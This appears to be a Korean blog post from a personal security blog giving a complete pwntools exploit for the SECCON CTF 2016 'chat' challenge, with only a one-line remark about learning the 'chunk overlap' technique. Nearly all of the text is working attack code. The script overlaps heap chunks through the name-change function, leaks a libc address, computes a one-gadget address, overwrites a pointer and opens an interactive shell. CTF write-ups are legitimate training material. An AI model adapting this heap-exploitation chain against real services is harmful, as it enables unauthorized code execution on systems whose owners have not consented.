cdor1's lab
SECCON CTF 2016 chat 본문
후기 : chunk overlap라는 기법을 알게 되었당
from pwn import *
s = remote('localhost', 4000)
def join(name):
print s.recvuntil('menu > ')
s.sendline('1')
print s.recvuntil('name > ')
s.sendline(name)
def login(name):
print s.recvuntil('menu > ')
s.sendline('2')
print s.recvuntil('name > ')
s.sendline(name)
def showtime():
print s.recvuntil('menu >> ')
s.sendline('1')
def showdm():
print s.recvuntil('menu >> ')
s.sendline('2')
def showuser():
print s.recvuntil('menu >> ')
s.sendline('3')
def sendpm(input):
print s.recvuntil('menu >> ')
s.sendline('4')
print s.recvuntil('message >> ')
s.sendline(input)
def senddm(name,input):
print s.recvuntil('menu >> ')
s.sendline('5')
print s.recvuntil('name >> ')
s.sendline(name)
print s.recvuntil('message >> ')
s.sendline(input)
def rmpm(num):
print s.recvuntil('menu >> ')
s.sendline('6')
print s.recvuntil('id >> ')
s.sendline(str(num))
def changename(input):
print s.recvuntil('menu >> ')
s.sendline('7')
print s.recvuntil('name >> ')
s.sendline(input)
def logout():
print s.recvuntil('menu >> ')
s.sendline('0')
join('a')
login('a')
sendpm('A'*100)
logout()
join('p')
login('a')
rmpm('1')
changename('a'*24 + '\xff\xff')
logout()
join('c')
login('p')
sendpm('a'*80 + '\x40\x30\x60')
showuser()
print s.recvuntil('*')
print s.recvuntil('*')
print s.recvuntil('* ')
leak = u64(s.recv(6).ljust(8,'\x00'))
libc_base = leak - 0x21e50
oneshot = libc_base + 0x4647c
print ('[*] main_got: ' + hex(leak))
print ('[*] libc_base: ' + hex(libc_base))
changename('A'*8 + p64(oneshot))
s.interactive()
'Security > Pwnable' 카테고리의 다른 글
| Christmasctf2016 - House of Daehee (0) | 2017.01.04 |
|---|---|
| SECCON CTF 2016 jmper (0) | 2016.12.28 |
| BCTF memo (0) | 2016.12.11 |
| fastbin consolidate (0) | 2016.12.08 |
| unsafe unlink (0) | 2016.12.07 |
Comments